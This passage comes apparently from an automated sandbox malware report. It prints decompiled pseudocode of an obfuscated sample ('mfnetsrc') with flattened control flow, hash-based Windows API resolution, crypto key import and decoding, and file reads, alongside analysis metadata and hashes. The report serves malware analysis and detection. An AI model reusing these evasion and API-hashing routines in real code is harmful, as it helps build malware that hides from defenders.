											if(_t151 == 0x8cf6762) {
												_t148 = _v128;
												__eflags = _t148;
												if(_t148 == 0) {
													E02AA4250(_t105,  *_t140);
												}
												return _t148;
											} else {
												goto L8;
											}
										}
									}
								}
							}
							L51:
						}
						__eflags = _t151 - 0x2f4b92a8;
						if(__eflags > 0) {
							__eflags = _t151 - 0x3b18423d;
							if(_t151 != 0x3b18423d) {
								goto L8;
							} else {
								_t151 = 0x2f4b92a8;
								goto L2;
							}
						} else {
							if(__eflags == 0) {
								_t85 = _t113[1] + 1;
								__eflags = _t85 & 0x0000000f;
								if((_t85 & 0x0000000f) != 0) {
									_t85 = (_t85 & 0xfffffff0) + 0x10;
									__eflags = _t85;
								}
								_t152 = _t85 + 0x74;
								_t86 =  *0x2aadea8;
								_t140[1] = _t152;
								__eflags = _t86;
								if(_t86 == 0) {
									_t86 = E02AA3E80(_t105, E02AA3F20(0xbb398380), 0x97f883e, _t156);
									 *0x2aadea8 = _t86;
								}
								_t149 =  *_t86();
								__eflags =  *0x2aadcec;
								if( *0x2aadcec == 0) {
									 *0x2aadcec = E02AA3E80(_t105, E02AA3F20(0xbb398380), 0xe9233692, _t156);
								}
								_t89 = RtlAllocateHeap(_t149, 8, _t152); // executed
								_t140 = _v140;
								_t105 = _t89;
								 *_t140 = _t105;
								__eflags = _t105;
								if(_t105 == 0) {
									break;
								} else {
									_t53 = _t105 + 0x74; // 0x74
									_t61 = _t53;
									_t151 = 0x1c8b703e;
									_v148 = _t61;
									_t156 =  &_v116;
									_v128 = _v144[1];
									_t113 = _v144;
									goto L2;
								}
							} else {
								__eflags = _t151 - 0x1fd32dab;
								if(_t151 == 0x1fd32dab) {
									_t118 =  *0x2aae0f8;
									_v116 = 0x6c;
									__eflags = _t118;
									if(_t118 == 0) {
										_t118 = E02AA3E80(_t105, E02AA3F20(0x667fdee), 0xd10d6746, _t156);
										 *0x2aae0f8 = _t118;
									}
									_t92 =  *0x2aae2e4; // 0xdf3588
									_t93 =  *_t118( *((intOrPtr*)(_t92 + 0x20)),  *((intOrPtr*)(_t92 + 0x1c)), 1, 0x40,  &_v108,  &_v116); // executed
									__eflags = _t93;
									if(_t93 == 0) {
										_t113 = _v160;
										_t151 = 0x14926a00;
										_t140 = _v156;
										goto L1;
									} else {
										_t121 =  &_v25;
										_t143 = _t105;
										do {
											_t143 = _t143 + 1;
											 *((char*)(_t143 - 1)) =  *_t121;
											_t121 = _t121 - 1;
											__eflags = _t121 -  &_v120;
										} while (_t121 >=  &_v120);
										_t113 = _v160;
										_t151 = 0x3028e43;
										_t140 = _v156;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								} else {
									__eflags = _t151 - 0x2e5f3ebd;
									if(_t151 != 0x2e5f3ebd) {
										goto L8;
									} else {
										_t98 =  *0x2aadaac;
										_t153 = _t113[1];
										_t150 =  *_t113;
										__eflags = _t98;
										if(_t98 == 0) {
											_t98 = E02AA3E80(_t105, E02AA3F20(0xe66945e6), 0x70f7b8ec, _t156);
											 *0x2aadaac = _t98;
										}
										 *_t98(_v140, _t150, _t153);
										_t113 = _v136;
										_t158 =  &(_t158[3]);
										_t140 = _v132;
										_t151 = 0x13859baf;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								}
							}
						}
						goto L51;
						L8:
					} while (_t151 != 0xd360827);
					return _v128;
					goto L51;
				}
			}

0x02aa2290
0x02aa2297
0x02aa229e
0x02aa22a4
0x02aa22a8
0x02aa22ad
0x02aa22b1
0x02aa22b5
0x02aa22b5
0x02aa22b5
0x02aa22c0
0x02aa22c0
0x02aa22c0
0x02aa22c0
0x02aa22c6
0x00000000
0x00000000
0x02aa22cc
0x02aa2422
0x02aa2428
0x02aa242a
0x02aa2442
0x02aa2444
0x02aa2444
0x02aa244f
0x02aa245b
0x02aa2467
0x02aa246f
0x02aa22b5
0x02aa22b5
0x02aa22b5
0x00000000
0x02aa22b5
0x02aa22d2
0x02aa22d2
0x02aa22d8
0x02aa23da
0x02aa23e0
0x00000000
0x02aa23e6
0x02aa23e6
0x02aa23eb
0x02aa23ed
0x02aa2400
0x02aa2405
0x02aa2405
0x02aa240e
0x02aa2414
0x02aa22b5
0x02aa22b5
0x02aa22b5
0x00000000
0x02aa22b5
0x02aa22b5
0x02aa22de
0x02aa22de
0x02aa2378
0x02aa237e
0x02aa2380
0x02aa2398
0x02aa239a
0x02aa239e
0x02aa239e
0x02aa23ab
0x02aa23bb
0x02aa23bd
0x02aa23c3
0x02aa23c7
0x02aa23cf
0x02aa22b5
0x02aa22b5
0x02aa22b5
0x00000000
0x02aa22b5
0x02aa22e4
0x02aa22ea
0x02aa230f
0x02aa2315
0x02aa231d
0x02aa231f
0x02aa2337
0x02aa2339
0x02aa2339
0x02aa2350
0x02aa2352
0x02aa2356
0x02aa2358
0x02aa235c
0x02aa2360
0x02aa2366
0x02aa236b
0x02aa22b5
0x02aa22b5
0x02aa22b5
0x00000000
0x02aa22b5
0x02aa22b5
0x00000000
0x02aa22ec
0x02aa22f2
0x02aa2627
0x02aa262b
0x02aa262d
0x02aa2631
0x02aa2631
0x02aa2642
0x00000000
0x00000000
0x00000000
0x02aa22f2
0x02aa22ea
0x02aa22de
0x02aa22d8
0x00000000
0x02aa22cc
0x02aa247a
0x02aa2480
0x02aa2611
0x02aa2617
0x00000000
0x02aa261d
0x02aa261d
0x00000000
0x02aa261d
0x02aa2486
0x02aa2486
0x02aa2578
0x02aa2579
0x02aa257b
0x02aa2580
0x02aa2580
0x02aa2580
0x02aa2583
0x02aa2586
0x02aa258b
0x02aa258e
0x02aa2590
0x02aa25a3
0x02aa25a8
0x02aa25a8
0x02aa25af
0x02aa25b6
0x02aa25b8
0x02aa25d0
0x02aa25d0
0x02aa25d9
0x02aa25db
0x02aa25df
0x02aa25e1
0x02aa25e3
0x02aa25e5
0x00000000
0x02aa25eb
0x02aa25ef
0x02aa25ef
0x02aa25f5
0x02aa25fa
0x02aa25fe
0x02aa2604
0x02aa2608
0x00000000
0x02aa2608
0x02aa248c
0x02aa248c
0x02aa2492
0x02aa24e6
0x02aa24ec
0x02aa24f4
0x02aa24f6
0x02aa250e
0x02aa2510
0x02aa2510
0x02aa2520
0x02aa252f
0x02aa2531
0x02aa2533
0x02aa2563
0x02aa2567
0x02aa256c
0x00000000
0x02aa2535
0x02aa2535
0x02aa253c
0x02aa2540
0x02aa2542
0x02aa2545
0x02aa2548
0x02aa254d
0x02aa254d
0x02aa2551
0x02aa2555
0x02aa255a
0x02aa22b5
0x02aa22b5
0x02aa22b5
0x00000000
0x02aa22b5
0x02aa22b5
0x02aa2494
0x02aa2494
0x02aa249a
0x00000000
0x02aa24a0
0x02aa24a0
0x02aa24a5
0x02aa24a8
0x02aa24aa
0x02aa24ac
0x02aa24bf
0x02aa24c4
0x02aa24c4
0x02aa24cf
0x02aa24d1
0x02aa24d5
0x02aa24d8
0x02aa24dc
0x02aa22b5
0x02aa22b5
0x02aa22b5
0x00000000
0x02aa22b5
0x02aa22b5
0x02aa249a
0x02aa2492
0x02aa2486
0x00000000
0x02aa22f8
0x02aa22f8
0x02aa230e
0x00000000
0x02aa230e

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 02AA25D9

Strings

Ei, xrefs: 02AA24AE
l, xrefs: 02AA24EC

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: l$Ei
API String ID: 1279760036-2145112675
Opcode ID: f3a8b94dba4c10c8742e2d5e6b575dff2e850dd1e858881f2c5b1676f33bcd63
Instruction ID: 254e332b9258cc12b81ef420c7687a2304b7bef3a1bfd186371c702c6fe56194
Opcode Fuzzy Hash: f3a8b94dba4c10c8742e2d5e6b575dff2e850dd1e858881f2c5b1676f33bcd63
Instruction Fuzzy Hash: D0919471A443029BDB18DF64D5A0B6AF7E6AFC8304F05496DE8959B350DF30DC298B92

Uniqueness

Uniqueness Score: -1.00%

Function 02AA2650, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E02AA2650(intOrPtr* __ecx) {
				char _v4;
				char _v8;
				intOrPtr _v32;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t21;
				intOrPtr _t26;
				signed int _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t32;
				intOrPtr* _t33;
				intOrPtr* _t35;
				signed int _t36;
				intOrPtr* _t37;
				intOrPtr _t39;
				intOrPtr* _t42;
				void* _t52;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t69;
				intOrPtr _t76;
				intOrPtr* _t84;
				intOrPtr* _t85;
				intOrPtr* _t91;
				intOrPtr* _t96;
				signed int _t97;
				void* _t108;
				void* _t110;
				void* _t111;

				_t96 = __ecx;
				_t97 = 0x50194b2;
				goto L1;
				do {
					while(1) {
						L1:
						_t110 = _t97 - 0x1e656080;
						if(_t110 > 0) {
							break;
						}
						if(_t110 == 0) {
							_t84 =  *0x2aadddc;
							__eflags = _t84;
							if(_t84 == 0) {
								_t84 = E02AA3E80(_t52, E02AA3F20(0x667fdee), 0x41956823, _t108);
								 *0x2aadddc = _t84;
							}
							_t16 =  *0x2aae2e4; // 0xdf3588
							_t4 = _t16 + 0x18; // 0xdf35a0
							_t17 =  *_t84( *((intOrPtr*)(_t16 + 8)), 0x8004, 0, 0, _t4); // executed
							__eflags = _t17;
							if(_t17 != 0) {
								return 1;
							} else {
								_t97 = 0x264cda0c;
								continue;
							}
						} else {
							_t111 = _t97 - 0xf71ec4a;
							if(_t111 > 0) {
								__eflags = _t97 - 0x1032ae84;
								if(_t97 == 0x1032ae84) {
									_t21 =  *0x2aadccc; // 0x0
									__eflags = _t21;
									if(_t21 == 0) {
										_t21 = E02AA3E80(_t52, E02AA3F20(0x667fdee), 0x60964008, _t108);
										 *0x2aadccc = _t21;
									}
									_t57 =  *0x2aae2e4; // 0xdf3588
									 *_t21( *((intOrPtr*)(_t57 + 0x1c)));
									_t97 = 0x20769828;
									continue;
								} else {
									__eflags = _t97 - 0x17703602;
									if(_t97 == 0x17703602) {
										_t60 =  *0x2aae2e4; // 0xdf3588
										E02AA4250(_t52, _t60);
										__eflags = 0;
										return 0;
									} else {
										goto L17;
									}
								}
							} else {
								if(_t111 == 0) {
									_t85 =  *0x2aae13c;
									__eflags = _t85;
									if(_t85 == 0) {
										_t85 = E02AA3E80(_t52, E02AA3F20(0x667fdee), 0x5f84d0c6, _t108);
										 *0x2aae13c = _t85;
									}
									_t26 =  *0x2aae2e4; // 0xdf3588
									_t1 = _t26 + 0x20; // 0xdf35a8
									_t27 =  *_t85( *((intOrPtr*)(_t26 + 8)), 0x660e, 1, _t1); // executed
									asm("sbb esi, esi");
									_t97 = ( ~_t27 & 0x0e32b1fc) + 0x1032ae84;
									continue;
								} else {
									if(_t97 == 0x50194b2) {
										_t30 = E02AA42F0(_t52, 0x24);
										 *0x2aae2e4 = _t30;
										__eflags = _t30;
										if(_t30 == 0) {
											goto L18;
										} else {
											_t97 = 0x85ecca9;
											continue;
										}
									} else {
										if(_t97 != 0x85ecca9) {
											goto L17;
										} else {
											_t31 =  *0x2aadee8;
											if(_t31 == 0) {
												_t31 = E02AA3E80(_t52, E02AA3F20(0x667fdee), 0x249f770b, _t108);
												 *0x2aadee8 = _t31;
											}
											_t65 =  *0x2aae2e4; // 0xdf3588
											_t32 =  *_t31(_t65 + 8, 0, 0, 0x18, 0xf0000040); // executed
											asm("sbb esi, esi");
											_t97 = ( ~_t32 & 0x0cc3aa0b) + 0x17703602;
											continue;
										}
									}
								}
							}
						}
						L47:
					}
					__eflags = _t97 - 0x2433e00d;
					if(__eflags > 0) {
						__eflags = _t97 - 0x264cda0c;
						if(_t97 != 0x264cda0c) {
							goto L17;
						} else {
							_t33 =  *0x2aadccc; // 0x0
							__eflags = _t33;
							if(_t33 == 0) {
								_t33 = E02AA3E80(_t52, E02AA3F20(0x667fdee), 0x60964008, _t108);
								 *0x2aadccc = _t33;
							}
							_t69 =  *0x2aae2e4; // 0xdf3588
							 *_t33( *((intOrPtr*)(_t69 + 0x20)));
							_t97 = 0x1032ae84;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t35 =  *0x2aae04c;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E02AA3E80(_t52, E02AA3F20(0x38bb5311), 0xa8366e55, _t108);
								 *0x2aae04c = _t35;
							}
							_t36 =  *_t35(0x10001, 0x13,  *_t96,  *((intOrPtr*)(_t96 + 4)), 0x8000, 0,  &_v8,  &_v4); // executed
							asm("sbb esi, esi");
							_t97 = ( ~_t36 & 0x029e39b6) + 0x20769828;
							goto L1;
						} else {
							__eflags = _t97 - 0x20769828;
							if(_t97 == 0x20769828) {
								_t37 =  *0x2aae084; // 0x0
								__eflags = _t37;
								if(_t37 == 0) {
									_t37 = E02AA3E80(_t52, E02AA3F20(0x667fdee), 0x476fbf6d, _t108);
									 *0x2aae084 = _t37;
								}
								_t76 =  *0x2aae2e4; // 0xdf3588
								 *_t37( *((intOrPtr*)(_t76 + 8)), 0);
								_t97 = 0x17703602;
								goto L1;
							} else {
								__eflags = _t97 - 0x2314d1de;
								if(_t97 == 0x2314d1de) {
									_t91 =  *0x2aaddfc;
									__eflags = _t91;
									if(_t91 == 0) {
										_t91 = E02AA3E80(_t52, E02AA3F20(0x667fdee), 0xaba13237, _t108);
										 *0x2aaddfc = _t91;
									}
									_t39 =  *0x2aae2e4; // 0xdf3588
									_t6 = _t39 + 0x1c; // 0xdf35a4
									 *_t91( *((intOrPtr*)(_t39 + 8)), _v8, _v4, 0, 0, _t6); // executed
									asm("sbb esi, esi");
									_t42 =  *0x2aadd40;
									_t97 = (_t97 & 0xeefb5422) + 0x20769828;
									__eflags = _t42;
									if(_t42 == 0) {
										_t42 = E02AA3E80(_t52, E02AA3F20(0xbb398380), 0x7f92dfac, _t108);
										 *0x2aadd40 = _t42;
									}
									 *_t42(_v32);
								}
								goto L17;
							}
						}
					}
					goto L47;
					L17:
					__eflags = _t97 - 0x16a1826b;
				} while (_t97 != 0x16a1826b);
				L18:
				__eflags = 0;
				return 0;
				goto L47;
			}

0x02aa2655
0x02aa2657
0x02aa2657
0x02aa2660
0x02aa2660
0x02aa2660
0x02aa2660
0x02aa2666
0x00000000
0x00000000
0x02aa266c
0x02aa27bc
0x02aa27c2
0x02aa27c4
0x02aa27dc
0x02aa27de
0x02aa27de
0x02aa27e4
0x02aa27e9
0x02aa27f9
0x02aa27fb
0x02aa27fd
0x02aa29af
0x02aa2803
0x02aa2803
0x00000000
0x02aa2803
0x02aa2672
0x02aa2672
0x02aa2678
0x02aa275b
0x02aa2761
0x02aa2783
0x02aa2788
0x02aa278a
0x02aa279d
0x02aa27a2
0x02aa27a2
0x02aa27a7
0x02aa27b0
0x02aa27b2
0x00000000
0x02aa2763
0x02aa2763
0x02aa2769
0x02aa2992
0x02aa2998
0x02aa299e
0x02aa29a4
0x00000000
0x00000000
0x00000000
0x02aa2769
0x02aa267e
0x02aa267e
0x02aa2707
0x02aa270d
0x02aa270f
0x02aa2727
0x02aa2729
0x02aa2729
0x02aa272f
0x02aa2734
0x02aa2742
0x02aa2748
0x02aa2750
0x00000000
0x02aa2684
0x02aa268a
0x02aa26ef
0x02aa26f4
0x02aa26f9
0x02aa26fb
0x00000000
0x02aa26fd
0x02aa26fd
0x00000000
0x02aa26fd
0x02aa268c
0x02aa2692
0x00000000
0x02aa2698
0x02aa2698
0x02aa269f
0x02aa26b2
0x02aa26b7
0x02aa26b7
0x02aa26bc
0x02aa26d1
0x02aa26d7
0x02aa26df
0x00000000
0x02aa26df
0x02aa2692
0x02aa268a
0x02aa267e
0x02aa2678
0x00000000
0x02aa266c
0x02aa280d
0x02aa2813
0x02aa294d
0x02aa2953
0x00000000
0x02aa2959
0x02aa2959
0x02aa295e
0x02aa2960
0x02aa2973
0x02aa2978
0x02aa2978
0x02aa297d
0x02aa2986
0x02aa2988
0x00000000
0x02aa2988
0x02aa2819
0x02aa2819
0x02aa28f3
0x02aa28f8
0x02aa28fa
0x02aa290d
0x02aa2912
0x02aa2912
0x02aa2934
0x02aa293a
0x02aa2942
0x00000000
0x02aa281f
0x02aa281f
0x02aa2825
0x02aa28b8
0x02aa28bd
0x02aa28bf
0x02aa28d2
0x02aa28d7
0x02aa28d7
0x02aa28dc
0x02aa28e7
0x02aa28e9
0x00000000
0x02aa282b
0x02aa282b
0x02aa2831
0x02aa2837
0x02aa283d
0x02aa283f
0x02aa2857
0x02aa2859
0x02aa2859
0x02aa285f
0x02aa2864
0x02aa2877
0x02aa287b
0x02aa287d
0x02aa2888
0x02aa288e
0x02aa2890
0x02aa28a3
0x02aa28a8
0x02aa28a8
0x02aa28b1
0x02aa28b1
0x00000000
0x02aa2831
0x02aa2825
0x02aa2819
0x00000000
0x02aa276f
0x02aa276f
0x02aa276f
0x02aa277c
0x02aa277c
0x02aa2782
0x00000000

APIs

CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?,?), ref: 02AA2934

Strings

3$, xrefs: 02AA280D

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: CryptDecodeObject
String ID: 3$
API String ID: 1207547050-3878113309
Opcode ID: 7943502f0816b00256596e456f7e0ab97363c772a17ef41727c6959952bf94b9
Instruction ID: a873c581659e2e54ea12761761885f6b051681037308d5fc9f07b555aed43b6a
Opcode Fuzzy Hash: 7943502f0816b00256596e456f7e0ab97363c772a17ef41727c6959952bf94b9
Instruction Fuzzy Hash: 3B71F031F902129BCF14AB79DD70B6AB6A3AF84704F054479ED469F254EF60DC268BC1

Uniqueness

Uniqueness Score: -1.00%

Function 02AA8240, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E02AA8240(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t86;
				intOrPtr* _t88;
				void* _t100;
				void* _t101;
				intOrPtr* _t103;
				intOrPtr* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				unsigned int _t138;
				void* _t140;
				void* _t141;
				signed int _t142;
				intOrPtr _t144;
				void* _t145;
				void* _t148;

				_t145 = __ebp;
				_t112 = __ebx;
				_v592 = 0xe2e3;
				_v592 = _v592 ^ 0xd0dd7a16;
				_t142 = 0x20540118;
				_v592 = _v592 * 0x3d;
				_v592 = _v592 | 0xc45f2d48;
				_v592 = _v592 + 0xffffa838;
				_v592 = _v592 + 0xde6b;
				_v592 = _v592 ^ 0xf67dff2c;
				_v592 = _v592 + _v592 * 4 << 2;
				_v592 = _v592 ^ 0xf4577600;
				_v584 = 0xc2f;
				_v584 = _v584 << 0xb;
				_v584 = _v584 * 0x17;
				_v584 = _v584 >> 8;
				_v584 = _v584 ^ 0x0008c1c9;
				_v580 = 0xfdf2;
				_v580 = _v580 << 7;
				_v580 = _v580 ^ 0x007ef903;
				_v588 = 0xe94a;
				_v588 = _v588 ^ 0xa24bbed7;
				_v588 = _v588 | 0x3a5f93cf;
				_t113 = _v588;
				_t141 = _v580;
				_v588 = (_v588 - (0x2c9fb4d9 * _t113 >> 0x20) >> 1) + (0x2c9fb4d9 * _t113 >> 0x20) >> 6;
				_v588 = _v588 | 0xa489ddc5;
				_v588 = _v588 + 0xf775;
				_t138 = 0x1b4e81b5 * _v588 >> 0x20 >> 3;
				_v588 = _t138;
				_v588 = _v588 ^ 0x0235bf01;
				while(1) {
					L1:
					_t148 = _t142 - 0x17c5ef14;
					if(_t148 > 0) {
						break;
					}
					if(_t148 == 0) {
						_t86 =  *0x2aadfec;
						__eflags = _t86;
						if(_t86 == 0) {
							_t111 = E02AA3F20(0xbb398380);
							_t138 = 0xd4fa8936;
							_t86 = E02AA3E80(_t112, _t111, 0xd4fa8936, _t145);
							 *0x2aadfec = _t86;
						}
						 *_t86( &_v572);
						_t142 = 0x2295af4;
						continue;
					} else {
						if(_t142 == 0xa7036f) {
							_t88 =  *0x2aade58;
							__eflags = _t88;
							if(_t88 == 0) {
								_t110 = E02AA3F20(0xbb398380);
								_t138 = 0xb1aefb5;
								_t88 = E02AA3E80(_t112, _t110, 0xb1aefb5, _t145);
								 *0x2aade58 = _t88;
							}
							 *_t88(0,  &_v524, 0x104);
							_t142 = 0xfef53a6;
							continue;
						} else {
							if(_t142 == 0x2295af4) {
								_v580 = 0xa8c00;
								_v576 = 0;
								_v596 = E02AAB590(_v580, _v576, 0x989680, 0);
								_v592 = _t138;
								_t140 = _v588 - _v564;
								_t144 = _v596;
								asm("sbb ecx, [esp+0x3c]");
								__eflags = _v584 - _v592;
								if(__eflags < 0) {
									goto L24;
								} else {
									if(__eflags > 0) {
										L29:
										return 1;
									} else {
										__eflags = _t140 - _t144;
										if(_t140 < _t144) {
											goto L24;
										} else {
											goto L29;
										}
									}
								}
							} else {
								if(_t142 != 0xfef53a6) {
									L23:
									__eflags = _t142 - 0x2ffd856e;
									if(_t142 != 0x2ffd856e) {
										continue;
									} else {
										goto L24;
									}
								} else {
									if( *0x2aadfbc == 0) {
										_t101 = E02AA3F20(0xbb398380);
										_t138 = 0xc0be2284;
										 *0x2aadfbc = E02AA3E80(_t112, _t101, 0xc0be2284, _t145);
									}
									_t100 = CreateFileW( &_v524, _v592, _v584, 0, _v580, _v588, 0); // executed
									_t141 = _t100;
									if(_t141 == 0xffffffff) {
										L24:
										__eflags = 0;
										return 0;
									} else {
										_t142 = 0x28eddbc7;
										continue;
									}
								}
							}
						}
					}
					L30:
				}
				__eflags = _t142 - 0x20540118;
				if(_t142 == 0x20540118) {
					_t142 = 0xa7036f;
					goto L1;
				} else {
					__eflags = _t142 - 0x28eddbc7;
					if(_t142 == 0x28eddbc7) {
						_t103 =  *0x2aae1e4;
						__eflags = _t103;
						if(_t103 == 0) {
							_t109 = E02AA3F20(0xbb398380);
							_t138 = 0xfddf2477;
							_t103 = E02AA3E80(_t112, _t109, 0xfddf2477, _t145);
							 *0x2aae1e4 = _t103;
						}
						 *_t103(_t141, 0,  &_v564, 0x28);
						asm("sbb esi, esi");
						_t106 =  *0x2aadc70;
						_t142 = (_t142 & 0xe7c869a6) + 0x2ffd856e;
						__eflags = _t106;
						if(_t106 == 0) {
							_t108 = E02AA3F20(0xbb398380);
							_t138 = 0x560d239b;
							_t106 = E02AA3E80(_t112, _t108, 0x560d239b, _t145);
							 *0x2aadc70 = _t106;
						}
						 *_t106(_t141);
					}
					goto L23;
				}
				goto L30;
			}

0x02aa8240
0x02aa8240
0x02aa8246
0x02aa824e
0x02aa825d
0x02aa8262
0x02aa8266
0x02aa826e
0x02aa8276
0x02aa827e
0x02aa8290
0x02aa8294
0x02aa829c
0x02aa82a4
0x02aa82ae
0x02aa82b7
0x02aa82bc
0x02aa82c4
0x02aa82cc
0x02aa82d1
0x02aa82d9
0x02aa82e1
0x02aa82e9
0x02aa82f1
0x02aa82f7
0x02aa8309
0x02aa830d
0x02aa8315
0x02aa8323
0x02aa8326
0x02aa832a
0x02aa8332
0x02aa8332
0x02aa8332
0x02aa8338
0x00000000
0x00000000
0x02aa833e
0x02aa83fc
0x02aa8401
0x02aa8403
0x02aa840a
0x02aa840f
0x02aa8416
0x02aa841b
0x02aa841b
0x02aa8425
0x02aa8427
0x00000000
0x02aa8344
0x02aa834a
0x02aa83c0
0x02aa83c5
0x02aa83c7
0x02aa83ce
0x02aa83d3
0x02aa83da
0x02aa83df
0x02aa83df
0x02aa83f0
0x02aa83f2
0x00000000
0x02aa834c
0x02aa8352
0x02aa84cf
0x02aa84d7
0x02aa84f7
0x02aa84fb
0x02aa8503
0x02aa8507
0x02aa850b
0x02aa8513
0x02aa8515
0x00000000
0x02aa8517
0x02aa8517
0x02aa851e
0x02aa852a
0x02aa8519
0x02aa8519
0x02aa851b
0x00000000
0x00000000
0x00000000
0x00000000
0x02aa851b
0x02aa8517
0x02aa8358
0x02aa835e
0x02aa84ac
0x02aa84ac
0x02aa84b2
0x00000000
0x00000000
0x00000000
0x00000000
0x02aa8364
0x02aa836c
0x02aa8373
0x02aa8378
0x02aa8386
0x02aa8386
0x02aa83a9
0x02aa83ab
0x02aa83b0
0x02aa84b8
0x02aa84b8
0x02aa84c2
0x02aa83b6
0x02aa83b6
0x00000000
0x02aa83b6
0x02aa83b0
0x02aa835e
0x02aa8352
0x02aa834a
0x00000000
0x02aa833e
0x02aa8431
0x02aa8437
0x02aa84c3
0x00000000
0x02aa843d
0x02aa843d
0x02aa8443
0x02aa8445
0x02aa844a
0x02aa844c
0x02aa8453
0x02aa8458
0x02aa845f
0x02aa8464
0x02aa8464
0x02aa8473
0x02aa8477
0x02aa8479
0x02aa8484
0x02aa848a
0x02aa848c
0x02aa8493
0x02aa8498
0x02aa849f
0x02aa84a4
0x02aa84a4
0x02aa84aa
0x02aa84aa
0x00000000
0x02aa8443
0x00000000

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 02AA83A9

Strings

J, xrefs: 02AA82D9

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: J
API String ID: 823142352-2715717022
Opcode ID: c558174def82bac05088da4b80715534a39d1b298fd8e32408680830a9077116
Instruction ID: 06b2ccf31c76133273c12d516a206dea3c3101fc54684ef398e8150dd7d9eb00
Opcode Fuzzy Hash: c558174def82bac05088da4b80715534a39d1b298fd8e32408680830a9077116
Instruction Fuzzy Hash: EE61BD72A493019FC718DF68D8A4A2FB7E6AFC4744F048D1DF4959B280DB78C9098F92

Uniqueness

Uniqueness Score: -1.00%

Function 02AA5360, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E02AA5360(void* __ebx, void* __ebp) {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				void* _t8;
				intOrPtr* _t16;
				intOrPtr* _t19;
				void* _t22;
				void* _t31;
				void* _t32;
				void* _t35;

				_t32 = __ebp;
				_t22 = __ebx;
				_t8 = 0x26a841ee;
				_t31 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t35 = _t8 - 0x1fae9e92;
						if(_t35 > 0) {
							break;
						}
						if(_t35 == 0) {
							_t31 = _t31 + _v280 * 0x3e8;
							_t8 = 0x2e629178;
							continue;
						} else {
							if(_t8 == 0x41b9e46) {
								return (_v320 & 0x0000ffff) + _t31;
							} else {
								if(_t8 == 0xb2cdcb1) {
									_t16 =  *0x2aadb30;
									if(_t16 == 0) {
										_t16 = E02AA3E80(_t22, E02AA3F20(0xbb398380), 0xa4407471, _t32);
										 *0x2aadb30 = _t16;
									}
									 *_t16( &_v320); // executed
									_t8 = 0x22049820;
									continue;
								} else {
									if(_t8 != 0x142f3962) {
										goto L17;
									} else {
										_t19 =  *0x2aadedc;
										_v284 = 0x11c;
										if(_t19 == 0) {
											_t19 = E02AA3E80(_t22, E02AA3F20(0xe66945e6), 0x69e48357, _t32);
											 *0x2aadedc = _t19;
										}
										 *_t19( &_v284);
										_t8 = 0xb2cdcb1;
										continue;
									}
								}
							}
						}
						L22:
					}
					if(_t8 == 0x22049820) {
						_t31 = _t31 + (_v2 & 0x000000ff) * 0x186a0;
						_t8 = 0x1fae9e92;
						goto L1;
					} else {
						if(_t8 == 0x26a841ee) {
							_t8 = 0x142f3962;
							goto L1;
						} else {
							if(_t8 != 0x2e629178) {
								goto L17;
							} else {
								_t31 = _t31 + _v276 * 0x64;
								_t8 = 0x41b9e46;
								goto L1;
							}
						}
					}
					goto L22;
					L17:
				} while (_t8 != 0x135ed498);
				return _t31;
				goto L22;
			}

0x02aa5360
0x02aa5360
0x02aa5366
0x02aa536c
0x02aa536c
0x02aa5370
0x02aa5370
0x02aa5370
0x02aa5370
0x02aa5375
0x00000000
0x00000000
0x02aa537b
0x02aa5415
0x02aa5417
0x00000000
0x02aa5381
0x02aa5386
0x02aa548e
0x02aa538c
0x02aa5391
0x02aa53d8
0x02aa53df
